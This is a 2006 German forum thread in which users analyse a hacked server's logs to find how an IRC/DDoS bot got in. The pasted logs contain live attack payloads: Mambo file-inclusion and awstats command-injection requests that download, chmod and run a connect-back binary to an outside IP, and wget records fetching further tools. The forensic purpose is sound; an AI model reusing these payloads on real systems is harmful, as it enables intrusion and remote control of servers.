Server schon wieder gehackt.

Begonnen von Musicman75, 11 Februar 2006, 12:10:41

Vorheriges Thema - Nächstes Thema

0 Mitglieder und 1 Gast betrachten dieses Thema.

Drucken
Nach unten Seiten 1 2 Alle
Benutzer-Aktionen

Musicman75

#20
12 Februar 2006, 17:21:17
wenn ich das so eingebe kommt auch nichts. sprint sofort wieder auf den prompt zurück.
Unaufgeforderte Support PMs & Emails werden ignoriert

Immer erst die Boardsuche verwenden und gegebenenfalls einen neuen Threat eröffnen, wenn das Problem noch nicht behandelt wurde!

jubilee

#21
12 Februar 2006, 17:34:09
Hmmm ...
Gut, wenn Du noch hast, dann lasse mir die alten Logfiles (message, error-, access-log)
bitte zukommen. Wenn es geht, bis VOR dem ersten Abschalten des Servers.
Mal sehen, ob wir da etwas finden können.
MfG
jubilee

FrankP

#22
12 Februar 2006, 18:51:45
Das Script ist ein IRC-Server, die IRC-Ports sind jedoch zu - ergo lag das halt da rum, hat ein bißchen Last gemacht und gut war. Kann durch viele Scripte z.B. bei einem Server mit safe_mode off in Kombination mit undefinierter open_basedir raufgekommen sein. Oft zu finden in den tmp-Verzeichnissen oder in /dev/shm. Eine ausgehende ddos ist dadurch aber eher nicht ausgelöst worden, ergo gibt es da noch was anderes.
Was ich nicht verstehe, ist die Aussage des Providers - entweder sie wissen es , dann können sie uns auch getroßt nicht dumm sterben lassen oder sie wissen es nicht
Webhosting für pragmaMx www.abundus.de
Wer Butter will soll Butter kaufen, statt stundenlang auf die Milch einzudreschen und sich zu wundern, warum nur Käse rauskommt.

jubilee

#23
13 Februar 2006, 08:52:33
Hallo !
Zitatlassen oder sie wissen es nicht
Ich denke eher, das sie es nicht wissen ....

ZitatDas Script ist ein IRC-Server, die IRC-Ports sind jedoch zu
Die Ports die wir angenommen haben sind zu. Du siehst im Script aber, das der Kommunikationsport frei eingestellt werden kann. Das Schöne an den Script ist ja, das es sich selber meldet und in einem festgelegten IRC-Channel seinen Master kontaktiert. Die Variablenwerte datz holt er sich wieder von anderen Servern (getnick(), getname(), getident() )
Das Script selber ist allemal in der Lage einen DDOS auszuführen (wie Du im Unterprogramm attacker siehst)
Auch das kein Serverprozess von der Bash gestartet existiert, soll in diesem Moment noch nicht viel bedeuten.
Es ist eminent wichtig, das wir den Einschleusungspunkt definitiv festmachen können. ich vermute auch ein PHP-Script mit nicht korrekt überwachten/geprüften Variablen nach aussen.

MfG
jubilee


FrankP

#24
13 Februar 2006, 09:38:35
Nun, das Script ist mir wohlbekannt und selbstverständlich ist es -  wie bei jedem Angriff - absolut unabdingbar, festzustellen, wie es eingeschleust werden konnte. Das Script wurde, soweit mit bekannt ist, bislang jedoch noch nie für eine ddos genutzt, deshalb halte ich es eher für unwahrscheinlich, dass dieses Script nun dafür verantwortlich sein sollte und vermute, dass auf dem Server noch wesentlich mehr kompromitiert wurde.

Ist denn überhaupt nachgewiesen, dass eine ausgehende ddos stattfand? Wer sagt das bzw. wo sind die die Belege? Ich muss mich etwas vorsichgtig ausdrücken - bei Servern mit hohem Inklusivtraffic bzw. Trafficflat liegt das Argument, der Server sei eine ddos-Schleuder, nur um ihn abschalten zu können, wenn er "zuviel" Traffic macht, geradezu auf der Hand.

Klar ist, der Server ist komprommitiert worden und der Angriffspunkt sollte gefunden werden. Sehr oft wir man jedoch vom offensichtlichen geblendet und sieht das versteckte nicht. Es ist schon fast (trauriger) Standard, dass bei den Billigroots so ein IRC-Server rumliegt und nicht viel anstellt, solange die Firewall ordentlich konfiguriert ist. Mal eben schnell den safe_mode abschalten, ohne das Umfeld anzupassen und schon gibt es dutzende, sonst "sichere" Scripte, über die man die Dinger uploaden kann.
Würde Provider xyz jeden Kunden, der so ein Ding auf seiner Kiste hat, abschalten, hätte er 30% weniger Kunden.
Webhosting für pragmaMx www.abundus.de
Wer Butter will soll Butter kaufen, statt stundenlang auf die Milch einzudreschen und sich zu wundern, warum nur Käse rauskommt.

jubilee

#25
13 Februar 2006, 09:49:17
ZitatIst denn überhaupt nachgewiesen, dass eine ausgehende ddos stattfand?
Pffff. Das kann Dir nur der Musicman beantworten (wobei ich glaube, das er auch nicht viel mehr Info's bekommen hat)

Zitatund vermute, dass auf dem Server noch wesentlich mehr kompromitiert wurde.
Genau.
2 Sachen machen mich da stutzig.
A: Das Teil ist nicht auffindbar.
B: Das Teil scheint z. Zt. nicht aktiv zu sein.
Für mich ein Indiz dafür, das der Hacker auf ein anderes Tool umgestiegen ist,
welches jetzt die "Aufgaben" übernimmt.

MfG
jubilee

jubilee

#26
13 Februar 2006, 11:20:48 Letzte Bearbeitung: 13 Februar 2006, 11:25:56 von jubilee
So
Schon einmal in die alten logfiles reingesehen.
Die haben gezielt nach schwachstellen gesucht :
Code Auswählen

209.250.116.251 - - [07/Jan/2006:01:39:39 +0100] "GET /index2.php?option=com_content&do_pdf=1&id=1index2.php?_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://209.16.85.15/cmd.gif?&cmd=cd%20/tmp;wget%20216.103.82.214/cback;chmod%20744%20cback;./cback%20217.160.242.90%208081;echo%20YYY;echo|  HTTP/1.1" 404 1046 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1;)"
209.250.116.251 - - [07/Jan/2006:01:39:40 +0100] "GET /index.php?option=com_content&do_pdf=1&id=1index2.php?_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://209.16.85.15/cmd.gif?&cmd=cd%20/tmp;wget%20216.103.82.214/cback;chmod%20744%20cback;./cback%20217.160.242.90%208081;echo%20YYY;echo|  HTTP/1.1" 302 - "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1;)"
209.250.116.251 - - [07/Jan/2006:01:39:41 +0100] "GET /mambo/index2.php?_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://209.16.85.15/cmd.gif?&cmd=cd%20/tmp;wget%20216.103.82.214/cback;chmod%20744%20cback;./cback%20217.160.242.90%208081;echo%20YYY;echo|  HTTP/1.1" 404 1046 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1;)"
209.250.116.251 - - [07/Jan/2006:01:39:42 +0100] "GET /cvs/index2.php?_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://209.16.85.15/cmd.gif?&cmd=cd%20/tmp;wget%20216.103.82.214/cback;chmod%20744%20cback;./cback%20217.160.242.90%208081;echo%20YYY;echo|  HTTP/1.1" 404 1046 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1;)"
209.250.116.251 - - [07/Jan/2006:01:39:43 +0100] "POST /xmlrpc.php HTTP/1.1" 404 1046 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1;)"
209.250.116.251 - - [07/Jan/2006:01:39:44 +0100] "POST /drupal/xmlrpc.php HTTP/1.1" 404 - "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1;)"
209.250.116.251 - - [07/Jan/2006:01:39:45 +0100] "POST /phpgroupware/xmlrpc.php HTTP/1.1" 404 - "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1;)"
209.250.116.251 - - [07/Jan/2006:01:39:46 +0100] "POST /wordpress/xmlrpc.php HTTP/1.1" 404 - "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1;)"


Auch gezielt auf das Einfallstor awstats gesucht
Code Auswählen

68.122.17.241 - - [07/Jan/2006:13:33:49 +0100] "GET /awstats/awstats.pl?configdir=|echo;echo%20YYY;cd%20%2ftmp%3bwget%20212%2e159%2e69%2e87%2fkillos%3bchmod%20%2bx%20killos%3b%2e%2flisten;echo%20YYY;echo|  HTTP/1.1" 404 1046 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1;)"
68.122.17.241 - - [07/Jan/2006:13:33:53 +0100] "GET /cgi-bin/awstats.pl?configdir=|echo;echo%20YYY;cd%20%2ftmp%3bwget%20212%2e159%2e69%2e87%2fkillos%3bchmod%20%2bx%20killos%3b%2e%2flisten;echo%20YYY;echo|  HTTP/1.1" 404 1046 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1;)"
68.122.17.241 - - [07/Jan/2006:13:33:59 +0100] "GET /cgi-bin/awstats/awstats.pl?configdir=|echo;echo%20YYY;cd%20%2ftmp%3bwget%20212%2e159%2e69%2e87%2fkillos%3bchmod%20%2bx%20killos%3b%2e%2flisten;echo%20YYY;echo|  HTTP/1.1" 404 1046 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1;)"
68.122.17.241 - - [07/Jan/2006:13:34:03 +0100] "POST /xmlrpc.php HTTP/1.1" 404 1046 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1;)"


wirklich nach allen möglichkeiten gesucht
Code Auswählen

212.20.64.136 - - [10/Jan/2006:20:39:48 +0100] "GET /admin/pma/main.php HTTP/1.0" 404 1046 "-" "-"
212.20.64.136 - - [10/Jan/2006:20:39:49 +0100] "GET /admin/phpmyadmin/main.php HTTP/1.0" 404 1046 "-" "-"
212.20.64.136 - - [10/Jan/2006:20:39:49 +0100] "GET /admin/mysql/main.php HTTP/1.0" 404 1046 "-" "-"
212.20.64.136 - - [10/Jan/2006:20:39:49 +0100] "GET /phpmyadmin2/main.php HTTP/1.0" 404 1046 "-" "-"
212.20.64.136 - - [10/Jan/2006:20:39:49 +0100] "GET /mysqladmin/main.php HTTP/1.0" 404 1046 "-" "-"
212.20.64.136 - - [10/Jan/2006:20:39:49 +0100] "GET /mysql-admin/main.php HTTP/1.0" 404 1046 "-" "-"
212.20.64.136 - - [10/Jan/2006:20:39:49 +0100] "GET /main.php HTTP/1.0" 404 1046 "-" "-"
212.20.64.136 - - [10/Jan/2006:20:39:49 +0100] "GET /phpMyAdmin-2.5.6/main.php HTTP/1.0" 404 1046 "-" "-"
212.20.64.136 - - [10/Jan/2006:20:39:49 +0100] "GET /phpMyAdmin-2.5.4/main.php HTTP/1.0" 404 1046 "-" "-"
212.20.64.136 - - [10/Jan/2006:20:39:49 +0100] "GET /phpMyAdmin-2.5.1/main.php HTTP/1.0" 404 1046 "-" "-"
212.20.64.136 - - [10/Jan/2006:20:39:49 +0100] "GET /phpMyAdmin-2.2.3/main.php HTTP/1.0" 404 1046 "-" "-"
212.20.64.136 - - [10/Jan/2006:20:39:49 +0100] "GET /phpMyAdmin-2.2.6/main.php HTTP/1.0" 404 1046 "-" "-"
212.20.64.136 - - [10/Jan/2006:20:39:49 +0100] "GET /myadmin/main.php HTTP/1.0" 404 1046 "-" "-"
212.20.64.136 - - [10/Jan/2006:20:39:49 +0100] "GET /phpMyAdmin-2.6.0/main.php HTTP/1.0" 404 1046 "-" "-"
212.20.64.136 - - [10/Jan/2006:20:39:49 +0100] "GET /phpMyAdmin-2.6.0-pl1/main.php HTTP/1.0" 404 1046 "-" "-"
212.20.64.136 - - [10/Jan/2006:20:39:49 +0100] "GET /phpMyAdmin-2.6.3-pl1/main.php HTTP/1.0" 404 1046 "-" "-"
212.20.64.136 - - [10/Jan/2006:20:39:49 +0100] "GET /phpMyAdmin-2.6.3/main.php HTTP/1.0" 404 1046 "-" "-"
212.20.64.136 - - [10/Jan/2006:20:39:49 +0100] "GET /phpMyAdmin-2.6.3-rc1/main.php HTTP/1.0" 404 1046 "-" "-"
212.20.64.136 - - [10/Jan/2006:20:39:49 +0100] "GET /phpMyAdmin-2.6.2-rc1/main.php HTTP/1.0" 404 1046 "-" "-"

jubilee

#27
13 Februar 2006, 11:31:58 Letzte Bearbeitung: 13 Februar 2006, 11:34:56 von jubilee
Stutzig macht mich das hier :
Zitat212.95.252.16 - - [12/Jan/2006:09:19:53 +0100] "GET /./user/index.php HTTP/1.0" 200 2931 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)"
Warum bekommt er bei dieser Abfrage ein status 200
und hier auch
Zitat66.131.70.243 - - [15/Jan/2006:15:50:50 +0100] "GET /lostpwd.php HTTP/1.0" 200 2673 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0)"

@Musikman: gab es am 12 Januar ein solches Verzeichnis eine solche Datei  bei Dir ?

jubilee

#28
13 Februar 2006, 11:41:32 Letzte Bearbeitung: 13 Februar 2006, 12:15:09 von jubilee
Upsss ---->
Code Auswählen

193.163.220.4 - - [23/Jan/2006:00:41:26 +0100] "POST http://193.163.220.4:6667/ HTTP/1.0" 302 - "-" "-"
193.163.220.4 - - [23/Jan/2006:00:41:26 +0100] "CONNECT 193.163.220.4:6667 HTTP/1.0" 302 - "-" "-"
216.193.196.221 - - [23/Jan/2006:00:41:26 +0100] "CONNECT 216.193.223.223:4400 HTTP/1.0" 302 - "-" "-"
67.19.92.93 - - [23/Jan/2006:00:41:50 +0100] "POST http://127.0.0.1:6667/ HTTP/1.0" 302 - "-" "-"
67.19.92.93 - - [23/Jan/2006:00:41:50 +0100] "CONNECT 127.0.0.1:6667 HTTP/1.0" 302 - "-" "-"
64.237.42.52 - - [23/Jan/2006:00:42:03 +0100] "CONNECT 216.32.207.207:6665 HTTP/1.0" 302 - "-" "-"
64.237.42.52 - - [23/Jan/2006:00:42:03 +0100] "POST http://216.32.207.207:6665/ HTTP/1.0" 302 - "-" "-"
194.109.21.230 - - [23/Jan/2006:00:42:56 +0100] "POST http://194.109.153.5:6667/ HTTP/1.0" 302 - "-" "-"
194.109.21.230 - - [23/Jan/2006:00:42:56 +0100] "CONNECT 194.109.153.5:6667 HTTP/1.0" 302 - "-" "-"


dazu aus der gleichen Zeit das error-log
Code Auswählen

[Mon Jan 23 00:41:09 2006] [error] [client 84.138.38.44] File does not exist: /home/htdocs/web0/html/main/modules/Forum/Themes/theme2/images, referer: http://www.gothic-online.de/main/modules.php?name=Forum&topic=535.0
--00:41:14--  http://metawire.org/%7Ewolfinux/fsch
           => `fsch'
Resolving metawire.org... 216.147.196.26
Connecting to metawire.org|216.147.196.26|:80... connected.
HTTP request sent, awaiting response... 200 OK
Length: 34,011 [text/plain]

    0K .......... .......... .......... ...                  100%   89.70 KB/s

00:41:15 (89.70 KB/s) - `fsch' saved [34,011/34,011]

php.cgi: no process killed
[Mon Jan 23 00:43:25 2006] [error] [client 84.138.38.44] File does not exist: /home/htdocs/web0/html/main/modules/Forum/Themes/theme2/images, referer: http://www.gothic-online.de/main/modules.php?name=Forum&topic=535.0


xinetd-log :
Code Auswählen

06/1/23@00:41:26: START: ftp from=193.163.220.4
06/1/23@00:41:26: START: ftp from=193.163.220.4
...
06/1/23@00:41:37: EXIT: ftp status=1 duration=11(sec)
06/1/23@00:41:37: EXIT: ftp status=1 duration=11(sec)


Nochmal am 30 Januar:
Code Auswählen

66.225.225.224 - - [30/Jan/2006:16:34:38 +0100] "CONNECT 194.109.153.2:6667 HTTP/1.0" 302 - "-" "-"
66.225.225.224 - - [30/Jan/2006:16:34:38 +0100] "POST http://194.109.153.2:6667/ HTTP/1.0" 302 - "-" "-"


eeror-log:
Code Auswählen

[client 80.171.152.44] script not found or unable to stat, referer: http://www.google.de/search?hl=de&cr=countryDE&q=hh1+orient+express&spell=1
--16:34:25--  http://buisn3ss.org/fsck
           => `fsck'
Resolving buisn3ss.org... 64.142.109.186
Connecting to buisn3ss.org|64.142.109.186|:80... connected.
HTTP request sent, awaiting response... 200 OK
Length: 30,697 [text/plain]

    0K .......... .......... .........                       100%   58.77 KB/s

16:34:26 (58.77 KB/s) - `fsck' saved [30,697/30,697]

php.cgi: no process killed
[Mon Jan 30 16:40:49 2006] [error] [client 84.188.249.220] File does not exist: /home/htdocs/web0/html/main/images/members/BloodGothic.jpg, referer: http://www.hifi-forum.de/viewthread-53-272.html

Musicman75

#29
13 Februar 2006, 11:46:37 Letzte Bearbeitung: 13 Februar 2006, 13:04:18 von Musicman75
- das eine ddos attacke von meinem server ausging sind die infos von 1und1.
- hatte im januar einen tag mit 630GB traffic, habe aber auch nicht entdeckt woher der kommt und noch weitere ports gesperrt.

- lostpwd.php gehört zum confixx. Dort gibts auch /user/index.php - Allerdings läuft Confiss als https und nicht http.

Weder auf dem Server, noch in den Sicherungsdaten kann ich ne Datei finden mit fsch oder fsck
Unaufgeforderte Support PMs & Emails werden ignoriert

Immer erst die Boardsuche verwenden und gegebenenfalls einen neuen Threat eröffnen, wenn das Problem noch nicht behandelt wurde!

jubilee

#30
13 Februar 2006, 13:56:42
ZitatWeder auf dem Server, noch in den Sicherungsdaten kann ich ne Datei finden mit fsch oder fsck
Mach Dir nix draus, der name wechselt regelmässig.

Zitathatte im januar einen tag mit 630GB traffic, habe aber auch nicht entdeckt woher der kommt
Jo, am 07.01 ist er auch ziemlich aktiv gewesen.
Code Auswählen

[Sat Jan 07 01:30:52 2006] [error] [client 84.171.102.21] File does not exist: /home/htdocs/web0/html/main/images/members/BloodGothic.jpg, referer: http://www.hifi-forum.de/viewthread-131-8-3.html
--01:45:07--  http://www.simple-hosting.biz/storm
           => `storm'
Resolving www.simple-hosting.biz... 66.97.161.61
Connecting to www.simple-hosting.biz|66.97.161.61|:80... connected.
HTTP request sent, awaiting response... 200 OK
Length: 34,881 [text/plain]

    0K .......... .......... .......... ....                 100%   63.47 KB/s

01:45:08 (63.47 KB/s) - `storm' saved [34,881/34,881]

php.cgi: no process killed
[Sat Jan 07 02:05:50 2006] [error] [client 207.46.98.139] File does not exist: /home/htdocs/web10/html/robots.txt
...
[client 62.178.6.54] script not found or unable to stat, referer: http://www.google.at/search?q=lakonia+gothic&hl=de&lr=&start=10&sa=N
--23:03:11--  http://www.zerounix.net/.a./x.c
           => `x.c'
Resolving www.zerounix.net... 70.86.76.34
Connecting to www.zerounix.net|70.86.76.34|:80... connected.
HTTP request sent, awaiting response... 200 OK
Length: 38,983 [text/plain]

    0K .......... .......... .......... ........             100%   95.87 KB/s

23:03:11 (95.87 KB/s) - `x.c' saved [38,983/38,983]

php.cgi: no process killed
--23:15:14--  http://www.zerounix.net/.a./x.c
           => `x.c'
Resolving www.zerounix.net... 70.86.76.34
Connecting to www.zerounix.net|70.86.76.34|:80... connected.
HTTP request sent, awaiting response... 200 OK
Length: 38,983 [text/plain]

    0K .......... .......... .......... ........             100%   95.84 KB/s

23:15:15 (95.84 KB/s) - `x.c' saved [38,983/38,983]

php.cgi: no process killed
--23:16:54--  http://www.zerounix.net/.a./x.c
           => `x.c'
Resolving www.zerounix.net... 70.86.76.34
Connecting to www.zerounix.net|70.86.76.34|:80... connected.
HTTP request sent, awaiting response... 200 OK
Length: 38,983 [text/plain]

    0K .......... .......... .......... ........             100%   96.11 KB/s

23:16:55 (96.11 KB/s) - `x.c' saved [38,983/38,983]

php.cgi: no process killed
[Sat Jan 07 23:21:08 2006] [error] [client 84.161.234.244] File does not exist: /home/htdocs/web0/html/main/modules/Forum/Themes/theme2/images, referer: http://www.gothic-online.de/main/modules.php?name=Forum&file=mxStyle&cstyle=theme2&mxstyle=GothicOnline-V5
[Sat Jan 07 23:21:08 2006] [error] [client 84.161.234.244] File does not exist: /home/htdocs/web0/html/main/modules/Forum/Themes/theme2/images, referer: http://www.gothic-online.de/main/modules.php?name=Forum&file=mxStyle&cstyle=theme2&mxstyle=GothicOnline-V5
[Sat Jan 07 23:21:21 2006] [error] [client 84.161.234.244] File does not exist: /home/htdocs/web0/html/main/modules/Forum/Themes/theme2/images, referer: http://www.gothic-online.de/main/modules.php?name=Forum&file=mxStyle&cstyle=theme2&mxstyle=GothicOnline-V5
[Sat Jan 07 23:21:36 2006] [error] [client 84.161.234.244] File does not exist: /home/htdocs/web0/html/main/modules/Forum/Themes/theme2/images, referer: http://www.gothic-online.de/main/modules.php?name=Forum&file=mxStyle&cstyle=theme2&mxstyle=GothicOnline-V5
[Sat Jan 07 23:25:37 2006] [error] [client 129.44.211.173] File does not exist: /home/htdocs/web0/html/main/themes/images, referer: http://www.gothic-online.de/main/modules.php?name=News&file=article&sid=71
[Sat Jan 07 23:27:43 2006] [error] [client 80.131.14.121] File does not exist: /home/htdocs/web0/html/main/modules/Forum/Themes/theme2/images, referer: http://www.gothic-online.de/main/modules.php?name=Forum
[Sat Jan 07 23:28:30 2006] [error] [client 80.131.14.121] File does not exist: /home/htdocs/web0/html/main/modules/Forum/Themes/theme2/images, referer: http://www.gothic-online.de/main/Forum.html
[Sat Jan 07 23:28:31 2006] [error] [client 80.131.14.121] File does not exist: /home/htdocs/web0/html/main/modules/Forum/Themes/theme2/images, referer: http://www.gothic-online.de/main/Forum.html
[Sat Jan 07 23:28:39 2006] [error] [client 80.131.14.121] File does not exist: /home/htdocs/web0/html/main/modules/Forum/Themes/theme2/images, referer: http://www.gothic-online.de/main/modules.php?name=Forum&topic=231.new
[Sat Jan 07 23:30:44 2006] [error] [client 200.151.137.121] File does not exist: /home/htdocs/web0/html/testcms, referer: http://www.google.de/search?hl=de&q=%22christian+nagel%22+abmahnung&btnG=Suche&meta=cr%3DcountryDE
--23:33:27--  http://www.zerounix.net/.a./x.c
           => `x.c'
Resolving www.zerounix.net... 70.86.76.34
Connecting to www.zerounix.net|70.86.76.34|:80... connected.
HTTP request sent, awaiting response... 200 OK
Length: 38,983 [text/plain]

    0K .......... .......... .......... ........             100%   95.95 KB/s

23:33:27 (95.95 KB/s) - `x.c' saved [38,983/38,983]

php.cgi: no process killed

Letztendlich festgestellt WIE er das immer auf den Server gebracht hat, habe ich nicht.
Evt. hat er einen Weg gefunden
entweder seine Spuren zu löschen oder
er kommt über einen weg der nicht in dioesen Logfiles auftaucht.
MfG
jubilee

Musicman75

#31
13 Februar 2006, 14:23:47 Letzte Bearbeitung: 13 Februar 2006, 15:17:14 von Musicman75
Danke schön. Hast vielleicht ne Ahnung wie man sowas unterbinden kann?

Die 630 GB Traffic hatte ich am 17.1. - am 16.1. waren es 103 GB - am 23.1. 128 GB

Steht vielleicht an diesen Tagen noch was verwertbares drin?
Lohnt es sich mit diesen Logfiles ne Anzeige zu machen?
Unaufgeforderte Support PMs & Emails werden ignoriert

Immer erst die Boardsuche verwenden und gegebenenfalls einen neuen Threat eröffnen, wenn das Problem noch nicht behandelt wurde!
Drucken
Nach oben Seiten 1 2 Alle
Benutzer-Aktionen